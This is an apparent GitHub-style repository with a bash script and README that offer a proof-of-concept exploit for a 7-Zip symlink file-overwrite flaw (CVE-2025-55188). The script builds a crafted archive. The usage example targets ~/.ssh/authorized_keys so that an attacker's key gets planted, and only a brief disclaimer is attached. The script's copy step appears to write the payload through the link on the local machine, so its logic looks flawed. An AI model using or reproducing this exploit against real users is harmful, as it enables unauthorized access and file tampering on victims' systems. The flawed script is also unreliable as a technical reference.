├── exploit.sh
└── README.md


/exploit.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | if [ "$#" -ne 3 ]; then
 3 |     echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
 4 |     echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
 5 |     exit 1
 6 | fi
 7 | 
 8 | PAYLOAD="$1"
 9 | TARGET="$2"
10 | OUT="$3"
11 | 
12 | WORKDIR=$(mktemp -d)
13 | ln -s "$TARGET" "$WORKDIR/symlink"
14 | cp "$PAYLOAD" "$WORKDIR/symlink"
15 | 
16 | tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
17 | 7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null
18 | 
19 | echo "[*] Exploit archive created: $OUT"
20 | rm -rf "$WORKDIR"
21 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2025-55188-7z-exploit
 2 | ---
 3 | 
 4 | # 7-Zip Symlink Arbitrary File Write PoC (CVE-2025-55188)
 5 | 
 6 | ## Description
 7 | 
 8 | This proof-of-concept demonstrates **CVE-2025-55188**, a vulnerability in 7-Zip versions prior to **25.01**.
 9 | The flaw occurs because 7-Zip does not properly handle **symbolic links** during extraction, allowing a crafted archive to overwrite arbitrary files on the target system.
10 | 
11 | If a victim extracts a malicious archive, the attacker can:
12 | 
13 | * Overwrite sensitive files (e.g., `.bashrc`, `~/.ssh/authorized_keys`, configuration files).
14 | * Potentially gain code execution or unauthorized access.
15 | 
16 | ---
17 | 
18 | ## How it Works
19 | 
20 | 1. An attacker creates a symbolic link pointing to a target file outside the extraction directory.
21 | 2. The link is added to a tar archive along with a payload file.
22 | 3. When the archive is extracted with a vulnerable version of 7-Zip, the symlink is followed, and the payload overwrites the target file.
23 | 
24 | ---
25 | 
26 | ## Requirements
27 | 
28 | * **7-Zip** version **older than 25.01**.
29 | * Target must extract the archive with `7z x` or a vulnerable extraction tool.
30 | * The extraction location must allow symlink traversal to the intended target file.
31 | 
32 | ---
33 | 
34 | ## Usage
35 | 
36 | ```bash
37 | ./exploit.sh <payload-file> <symlink-target> <output-archive>
38 | ```
39 | 
40 | * **payload-file**: File containing the malicious content to write.
41 | * **symlink-target**: Path to the file you want to overwrite (e.g., `../../.ssh/authorized_keys`).
42 | * **output-archive**: Name of the crafted `.7z` archive.
43 | 
44 | Example:
45 | 
46 | ```bash
47 | ./exploit.sh mykey.pub ../../.ssh/authorized_keys exploit.7z
48 | ```
49 | 
50 | ---
51 | 
52 | ## Disclaimer
53 | 
54 | This PoC is provided **for educational and testing purposes only**.
55 | Do not use it on systems you do not own or have explicit permission to test.
56 | Unauthorized use may violate laws and result in criminal or civil penalties.
57 | 
58 | ---


--------------------------------------------------------------------------------